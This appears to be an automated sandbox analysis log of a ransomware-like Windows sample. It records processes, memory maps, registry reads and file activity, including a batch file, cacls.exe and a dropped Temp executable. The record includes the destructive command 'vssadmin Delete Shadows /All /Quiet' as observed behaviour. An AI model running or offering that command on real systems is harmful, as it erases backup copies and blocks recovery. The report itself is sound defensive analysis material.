| Get Time | type = System Time, time = 2019-01-23 14:13:28 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #240: taskeng.exe
0
0
| Information | Value |
|---|---|
| ID | #240 |
| File Name | c:\windows\system32\taskeng.exe |
| Command Line | taskeng.exe {F134B57A-7FA1-49D0-84DF-8998DC2BAF98} S-1-5-18:NT AUTHORITY\System:Service: |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:03:53, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:09 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xda8 |
| Parent PID | 0x324 (c:\windows\system32\svchost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege |
| Thread IDs |
0x
D90
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x0000002fbf390000 | 0x2fbf390000 | 0x2fbf3affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000002fbf390000 | 0x2fbf390000 | 0x2fbf39ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000002fbf3b0000 | 0x2fbf3b0000 | 0x2fbf3c3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000002fbf3d0000 | 0x2fbf3d0000 | 0x2fbf44ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000002fbf450000 | 0x2fbf450000 | 0x2fbf453fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000002fbf460000 | 0x2fbf460000 | 0x2fbf460fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000002fbf470000 | 0x2fbf470000 | 0x2fbf471fff | Private Memory | rw |
|
|
|
- |
| private_0x0000002fbf4d0000 | 0x2fbf4d0000 | 0x2fbf5cffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x2fbf5d0000 | 0x2fbf68dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000002fbf690000 | 0x2fbf690000 | 0x2fbf70ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007df5ffad0000 | 0x7df5ffad0000 | 0x7ff5ffacffff | Pagefile Backed Memory | - |
|
|
|
- |
| pagefile_0x00007ff7cc270000 | 0x7ff7cc270000 | 0x7ff7cc36ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff7cc370000 | 0x7ff7cc370000 | 0x7ff7cc392fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff7cc398000 | 0x7ff7cc398000 | 0x7ff7cc398fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7cc39c000 | 0x7ff7cc39c000 | 0x7ff7cc39dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7cc39e000 | 0x7ff7cc39e000 | 0x7ff7cc39ffff | Private Memory | rw |
|
|
|
- |
| taskeng.exe | 0x7ff7ccd10000 | 0x7ff7ccd5cfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ffc55040000 | 0x7ffc5521cfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ffc552c0000 | 0x7ffc5535cfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ffc55800000 | 0x7ffc558acfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7ffc55910000 | 0x7ffc559cdfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ffc570a0000 | 0x7ffc571c5fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ffc571d0000 | 0x7ffc5744bfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
Process #241: cmd.exe
88
0
| Information | Value |
|---|---|
| ID | #241 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c ""C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" "C:\Program Files\Windows Journal\en-US\JNTFiltr.dll.mui"" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:53, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:09 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xc60 |
| Parent PID | 0xa70 (c:\users\ciihmnxmn6ps\desktop\mngrxc.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
648
0x
6D0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| cmd.exe | 0x003f0000 | 0x0043ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000a70000 | 0x00a70000 | 0x04a6ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004a70000 | 0x04a70000 | 0x04a8ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004a70000 | 0x04a70000 | 0x04a7ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004a80000 | 0x04a80000 | 0x04a83fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004a90000 | 0x04a90000 | 0x04a91fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004a90000 | 0x04a90000 | 0x04a93fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004aa0000 | 0x04aa0000 | 0x04ab3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004ac0000 | 0x04ac0000 | 0x04afffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004b00000 | 0x04b00000 | 0x04bfffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004c00000 | 0x04c00000 | 0x04c03fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004c10000 | 0x04c10000 | 0x04c10fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004c20000 | 0x04c20000 | 0x04c21fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04c30000 | 0x04cedfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004cf0000 | 0x04cf0000 | 0x04d2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d30000 | 0x04d30000 | 0x04d3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d70000 | 0x04d70000 | 0x04d7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d80000 | 0x04d80000 | 0x04faffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d80000 | 0x04d80000 | 0x04e7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004eb0000 | 0x04eb0000 | 0x04faffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004fb0000 | 0x04fb0000 | 0x0518ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x05190000 | 0x054c6fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| cmdext.dll | 0x741b0000 | 0x741b7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007eac0000 | 0x7eac0000 | 0x7ebbffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ebc0000 | 0x7ebc0000 | 0x7ebe2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ebe6000 | 0x7ebe6000 | 0x7ebe8fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ebe9000 | 0x7ebe9000 | 0x7ebe9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ebea000 | 0x7ebea000 | 0x7ebecfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ebed000 | 0x7ebed000 | 0x7ebedfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (40)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Get Info | "C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
5 | |
| Open | STD_OUTPUT_HANDLE | - |
|
18 | |
| Open | STD_INPUT_HANDLE | - |
|
2 | |
| Open | - | - |
|
4 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 30 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 83 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 81, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cacls.exe | os_pid = 0xf7c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x3f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x74f82780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x74f5fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x752a35c0 |
|
1 |
Environment (20)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
5 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
3 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
4 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = CIiHmnxMn6Ps |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 |
Process #243: vssadmin.exe
0
0
| Information | Value |
|---|---|
| ID | #243 |
| File Name | c:\windows\system32\vssadmin.exe |
| Command Line | vssadmin Delete Shadows /All /Quiet |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:03:55, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:07 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa7c |
| Parent PID | 0x3a4 (c:\windows\system32\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
BF8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000c83ace0000 | 0xc83ace0000 | 0xc83acfffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000c83ace0000 | 0xc83ace0000 | 0xc83aceffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000c83ad00000 | 0xc83ad00000 | 0xc83ad13fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000c83ad20000 | 0xc83ad20000 | 0xc83ad9ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000c83ada0000 | 0xc83ada0000 | 0xc83ada3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000c83adb0000 | 0xc83adb0000 | 0xc83adb0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000c83adc0000 | 0xc83adc0000 | 0xc83adc1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0xc83add0000 | 0xc83ae8dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000c83ae90000 | 0xc83ae90000 | 0xc83af0ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000c83afc0000 | 0xc83afc0000 | 0xc83b0bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007df5ff260000 | 0x7df5ff260000 | 0x7ff5ff25ffff | Pagefile Backed Memory | - |
|
|
|
- |
| pagefile_0x00007ff62b980000 | 0x7ff62b980000 | 0x7ff62ba7ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff62ba80000 | 0x7ff62ba80000 | 0x7ff62baa2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff62baab000 | 0x7ff62baab000 | 0x7ff62baacfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff62baad000 | 0x7ff62baad000 | 0x7ff62baaefff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff62baaf000 | 0x7ff62baaf000 | 0x7ff62baaffff | Private Memory | rw |
|
|
|
- |
| vssadmin.exe | 0x7ff62bd80000 | 0x7ff62bda7fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ffc55040000 | 0x7ffc5521cfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ffc552c0000 | 0x7ffc5535cfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ffc55800000 | 0x7ffc558acfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ffc570a0000 | 0x7ffc571c5fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ffc57540000 | 0x7ffc5759afff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7ffc57aa0000 | 0x7ffc57b45fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
Process #244: qry2vco2.exe
175
0
| Information | Value |
|---|---|
| ID | #244 |
| File Name | c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe |
| Command Line | qRY2vco2.exe -accepteula "Music.jtp" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:56, Reason: Child Process |
| Unmonitor | End Time: 00:03:59, Reason: Self Terminated |
| Monitor Duration | 00:00:03 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x270 |
| Parent PID | 0x854 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
B68
0x
E90
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001d0000 | 0x0028dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x002cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x002fffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x002d0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002f0000 | 0x002f0000 | 0x002fffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x00300000 | 0x00329fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000003c0000 | 0x003c0000 | 0x003cffff | Private Memory | rw |
|
|
|
- |
| qry2vco2.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0067ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0057ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000580000 | 0x00580000 | 0x0067ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000680000 | 0x00680000 | 0x00807fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000810000 | 0x00810000 | 0x00990fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000009a0000 | 0x009a0000 | 0x01d9ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001da0000 | 0x01da0000 | 0x01f5ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74220000 | 0x742b1fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x742f0000 | 0x742f7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x74ab0000 | 0x74abbfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74da0000 | 0x74de3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75180000 | 0x7518efff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75310000 | 0x766cefff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x766d0000 | 0x7678dfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x76790000 | 0x76c6cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x77260000 | 0x772a3fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77300000 | 0x7738cfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc57b4ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\qRY2vco264.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x74f40000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x77550000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x766d0000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x75030000 |
|
1 | |
| Load | USER32.dll | base_address = 0x76c70000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x742f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\qRY2vco2.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x74f660c0 |
|
1 | |
